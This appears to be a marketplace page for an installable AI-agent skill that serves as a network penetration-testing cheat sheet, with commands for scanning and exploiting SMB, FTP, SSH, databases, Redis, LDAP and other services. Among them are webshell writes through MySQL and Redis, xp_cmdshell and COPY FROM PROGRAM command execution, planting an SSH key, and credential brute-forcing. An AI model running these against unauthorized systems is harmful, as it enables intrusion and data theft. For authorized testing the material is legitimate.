0X6C7879/network-service-enumeration
skills/network-service-enumeration/SKILL.md
Enumerate and exploit network services including SMB, FTP, SSH, RDP, HTTP, databases (MySQL, MSSQL, PostgreSQL, MongoDB), LDAP, NFS, DNS, and SNMP. Use when testing network service security or performing port-based exploitation.
$ install --global
skillsauthnpx skillsauth add 0X6C7879/aegissec network-service-enumerationInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 23, 2026, 1:49 AM28.8s1 file scanned
SKILL.md
- name:
- network-service-enumeration
- description:
- Enumerate and exploit network services including SMB, FTP, SSH, RDP, HTTP, databases (MySQL, MSSQL, PostgreSQL, MongoDB), LDAP, NFS, DNS, and SNMP. Use when testing network service security or performing port-based exploitation.
Network Service Enumeration Skill
You are a network penetration testing expert specializing in service enumeration and exploitation. Use this skill when the user requests help with:
- Enumerating network services by port
- Exploiting common network services (SMB, FTP, SSH, RDP, etc.)
- Database service testing (MySQL, MSSQL, PostgreSQL, MongoDB)
- Service-specific vulnerability identification
- Banner grabbing and version detection
- Network protocol analysis
Core Methodologies
1. Port Scanning and Service Discovery
Nmap Scanning Strategies:
# Quick TCP scan
nmap -sC -sV -oA scan 10.10.10.10
# Full TCP port scan
nmap -p- -T4 10.10.10.10
nmap -p- -sV -sC -A 10.10.10.10 -oA full-scan
# UDP scan (top 1000)
sudo nmap -sU --top-ports 1000 10.10.10.10
# Aggressive scan
nmap -A -T4 10.10.10.10
# Specific port scan with scripts
nmap -p 445 --script smb-* 10.10.10.10
nmap -p 21 --script ftp-* 10.10.10.10
# Service version detection
nmap -sV --version-intensity 9 10.10.10.10
# OS detection
sudo nmap -O 10.10.10.10
Fast Port Scanning:
# masscan - very fast
masscan -p1-65535 10.10.10.10 --rate=1000
# rustscan - fast with nmap integration
rustscan -a 10.10.10.10 -- -sC -sV
2. SMB/SAMBA (Port 139, 445)
Enumeration:
# Nmap SMB scripts
nmap -p 445 --script smb-protocols 10.10.10.10
nmap -p 445 --script smb-security-mode 10.10.10.10
nmap -p 445 --script smb-enum-shares 10.10.10.10
nmap -p 445 --script smb-enum-users 10.10.10.10
# smbclient - list shares
smbclient -L //10.10.10.10 -N
smbclient -L //10.10.10.10 -U username
# smbmap
smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u username -p password
smbmap -H 10.10.10.10 -u username -p password -R # Recursive listing
# enum4linux
enum4linux -a 10.10.10.10
enum4linux -U -M -S -P -G 10.10.10.10
# crackmapexec
crackmapexec smb 10.10.10.10
crackmapexec smb 10.10.10.10 -u '' -p '' # Null session
crackmapexec smb 10.10.10.10 -u username -p password --shares
crackmapexec smb 10.10.10.10 -u username -p password --users
Connect to Shares:
# smbclient
smbclient //10.10.10.10/share -U username
smbclient //10.10.10.10/share -N # Null session
# Mount SMB share
mount -t cifs //10.10.10.10/share /mnt/smb -o username=user,password=pass
# Download all files recursively
smbget -R smb://10.10.10.10/share -U username
SMB Vulnerabilities:
# EternalBlue (MS17-010)
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
# Other SMB vulns
nmap -p 445 --script smb-vuln-* 10.10.10.10
3. FTP (Port 21)
Enumeration:
# Connect anonymously
ftp 10.10.10.10
# user: anonymous, pass: anonymous
# Nmap FTP scripts
nmap -p 21 --script ftp-anon 10.10.10.10
nmap -p 21 --script ftp-bounce 10.10.10.10
nmap -p 21 --script ftp-brute 10.10.10.10
# Download all files
wget -r ftp://anonymous:[email protected]/
FTP Commands:
# In FTP session
ls -la
cd directory
get filename # Download
mget * # Download multiple
put filename # Upload
binary # Set binary mode for binaries
4. SSH (Port 22)
Enumeration:
# Banner grab
nc 10.10.10.10 22
nmap -p 22 -sV 10.10.10.10
# Enumerate users
./ssh-user-enum.py --port 22 --userList users.txt 10.10.10.10
# Brute force (use carefully)
hydra -l root -P wordlist.txt ssh://10.10.10.10
SSH Key Auth:
# Connect with key
ssh -i id_rsa [email protected]
# Fix key permissions
chmod 600 id_rsa
# Generate SSH key pair
ssh-keygen -t rsa -b 4096
5. HTTP/HTTPS (Port 80, 443, 8080, 8443)
Web Enumeration:
# Whatweb - identify web technologies
whatweb http://10.10.10.10
# Nikto vulnerability scanner
nikto -h http://10.10.10.10
# Directory/file bruteforce
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://10.10.10.10 -w wordlist.txt
ffuf -u http://10.10.10.10/FUZZ -w wordlist.txt
# DNS subdomain enumeration
gobuster dns -d example.com -w subdomains.txt
ffuf -u http://FUZZ.example.com -w subdomains.txt
# Virtual host discovery
gobuster vhost -u http://10.10.10.10 -w vhosts.txt
SSL/TLS Testing:
# Check SSL certificate
openssl s_client -connect 10.10.10.10:443
# SSL vulnerabilities
nmap -p 443 --script ssl-* 10.10.10.10
testssl.sh https://10.10.10.10
6. RDP (Port 3389)
Enumeration:
# Nmap
nmap -p 3389 --script rdp-* 10.10.10.10
# Check if RDP is enabled
nmap -p 3389 -sV 10.10.10.10
Connect:
# rdesktop
rdesktop 10.10.10.10
# xfreerdp
xfreerdp /u:Administrator /p:password /v:10.10.10.10
xfreerdp /u:user /d:DOMAIN /v:10.10.10.10
Brute Force:
# hydra
hydra -l administrator -P passwords.txt rdp://10.10.10.10
# crowbar
crowbar -b rdp -s 10.10.10.10/32 -u admin -C passwords.txt
7. MySQL/MariaDB (Port 3306)
Enumeration:
# Nmap
nmap -p 3306 --script mysql-* 10.10.10.10
# Connect
mysql -h 10.10.10.10 -u root -p
mysql -h 10.10.10.10 -u root
MySQL Commands:
-- Show databases
SHOW DATABASES;
USE database_name;
-- Show tables
SHOW TABLES;
DESCRIBE table_name;
-- Read data
SELECT * FROM table_name;
SELECT user,password FROM mysql.user;
-- Read files (requires FILE privilege)
SELECT LOAD_FILE('/etc/passwd');
-- Write files
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
-- Command execution (UDF)
SELECT sys_exec('whoami');
8. MSSQL (Port 1433)
Enumeration:
# Nmap
nmap -p 1433 --script ms-sql-* 10.10.10.10
# Connect with impacket
mssqlclient.py user:[email protected]
mssqlclient.py user:[email protected] -windows-auth # Windows auth
MSSQL Commands:
-- Version
SELECT @@version;
-- Databases
SELECT name FROM sys.databases;
-- Current user
SELECT USER_NAME();
SELECT SYSTEM_USER;
-- Check if sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Execute commands
EXEC xp_cmdshell 'whoami';
9. PostgreSQL (Port 5432)
Connect:
# psql
psql -h 10.10.10.10 -U postgres
psql -h 10.10.10.10 -U postgres -d database_name
# Nmap
nmap -p 5432 --script pgsql-* 10.10.10.10
PostgreSQL Commands:
-- List databases
\l
-- Connect to database
\c database_name
-- List tables
\dt
-- Current user
SELECT current_user;
-- Read files
CREATE TABLE demo(t text);
COPY demo FROM '/etc/passwd';
SELECT * FROM demo;
-- Command execution (requires superuser)
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'whoami';
SELECT * FROM cmd_exec;
10. MongoDB (Port 27017)
Enumeration:
# Nmap
nmap -p 27017 --script mongodb-* 10.10.10.10
# Connect
mongo 10.10.10.10
mongo 10.10.10.10/database
MongoDB Commands:
// Show databases
show dbs
// Use database
use database_name
// Show collections
show collections
// Find documents
db.collection.find()
db.collection.find().pretty()
// Count documents
db.collection.count()
// Dump all data
db.collection.find().forEach(printjson)
11. Redis (Port 6379)
Enumeration:
# Connect
redis-cli -h 10.10.10.10
# Nmap
nmap -p 6379 --script redis-* 10.10.10.10
Redis Exploitation:
# In redis-cli
INFO # Server info
CONFIG GET dir # Get directory
CONFIG GET dbfilename
# Write SSH key
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET mykey "ssh-rsa AAAA..."
SAVE
# Write webshell
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SET mykey "<?php system($_GET['cmd']); ?>"
SAVE
12. LDAP (Port 389, 636)
Enumeration:
# Nmap
nmap -p 389 --script ldap-* 10.10.10.10
# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local"
ldapsearch -x -H ldap://10.10.10.10 -D "[email protected]" -w password -b "DC=domain,DC=local"
# Dump all
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local" "(objectClass=*)"
13. NFS (Port 2049)
Enumeration:
# Show exports
showmount -e 10.10.10.10
# Nmap
nmap -p 2049 --script nfs-* 10.10.10.10
Mount NFS:
# Mount share
mkdir /mnt/nfs
mount -t nfs 10.10.10.10:/share /mnt/nfs
# List mounted shares
df -h
14. DNS (Port 53)
Enumeration:
# Zone transfer
dig axfr @10.10.10.10 domain.com
host -l domain.com 10.10.10.10
# DNS enumeration
dnsenum domain.com
dnsrecon -d domain.com -t std
fierce -dns domain.com
# Nmap
nmap -p 53 --script dns-* 10.10.10.10
15. SNMP (Port 161)
Enumeration:
# snmpwalk
snmpwalk -v2c -c public 10.10.10.10
snmpwalk -v2c -c public 10.10.10.10 1.3.6.1.2.1.1
# onesixtyone - community string brute force
onesixtyone -c community.txt 10.10.10.10
# snmp-check
snmp-check 10.10.10.10 -c public
Quick Service Testing Commands
Banner Grabbing:
# Netcat
nc -nv 10.10.10.10 80
nc -nv 10.10.10.10 21
# Telnet
telnet 10.10.10.10 80
telnet 10.10.10.10 25
# Nmap
nmap -sV --script=banner 10.10.10.10
Reference Links
- HackTricks Service Pentesting: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/network-services-pentesting
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
- Nmap Scripts: https://nmap.org/nsedoc/
When to Use This Skill
Activate this skill when the user asks to:
- Enumerate network services on specific ports
- Test common network service vulnerabilities
- Connect to and exploit database services
- Perform service-specific reconnaissance
- Identify service misconfigurations
- Extract data from network services
- Help with network penetration testing
Always ensure proper authorization before testing any network services.
Related Skills
0X6C7879/wooyun-legacy
development
VerifiedTrustedCommunity
WooYun-derived business-logic testing methodology for web apps and APIs. Use when the request involves 支付、退款、订单、越权、认证、授权、价格篡改或业务流程绕过 review, especially black-box probing for price tampering, account takeover, and process bypass flaws.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/windows-privilege-escalation
tools
VerifiedTrustedCommunity
Escalate privileges on Windows systems using service misconfigurations, DLL hijacking, token manipulation, UAC bypasses, registry exploits, and credential dumping. Use when performing Windows post-exploitation or privilege escalation.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/tunnel
development
VerifiedTrustedCommunity
Use when performing AD pentest tunneling and pivoting, especially with Ligolo-ng, Chisel, frp, proxychains, SSH forwarding, SOCKS relays, reverse tunnels, or when internal reachability is the main blocker.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/threat-modeling
development
VerifiedTrustedCommunity
Threat model, security audit, find vulnerabilities, check security of my app, risk assessment, penetration test prep, analyze attack surface, what could an attacker exploit. Use this skill whenever a user wants holistic security analysis of a codebase, application, or project. MUST be invoked instead of analyzing security yourself — it runs a specialized 8-phase STRIDE workflow producing professional deliverables you cannot generate alone: risk assessment reports, DFD diagrams, threat inventories, attack path validation, mitigation plans, and pentest plans. Trigger on: 威胁建模, 安全评估, 渗透测试, 安全分析, 安全审计, 安全检查, 风险评估. NOT for: fixing one specific bug, adding one security feature (rate limiting, CORS), writing tests, CI/CD setup, or debugging errors.
2SKILL.mdUpdated Apr 22, 2026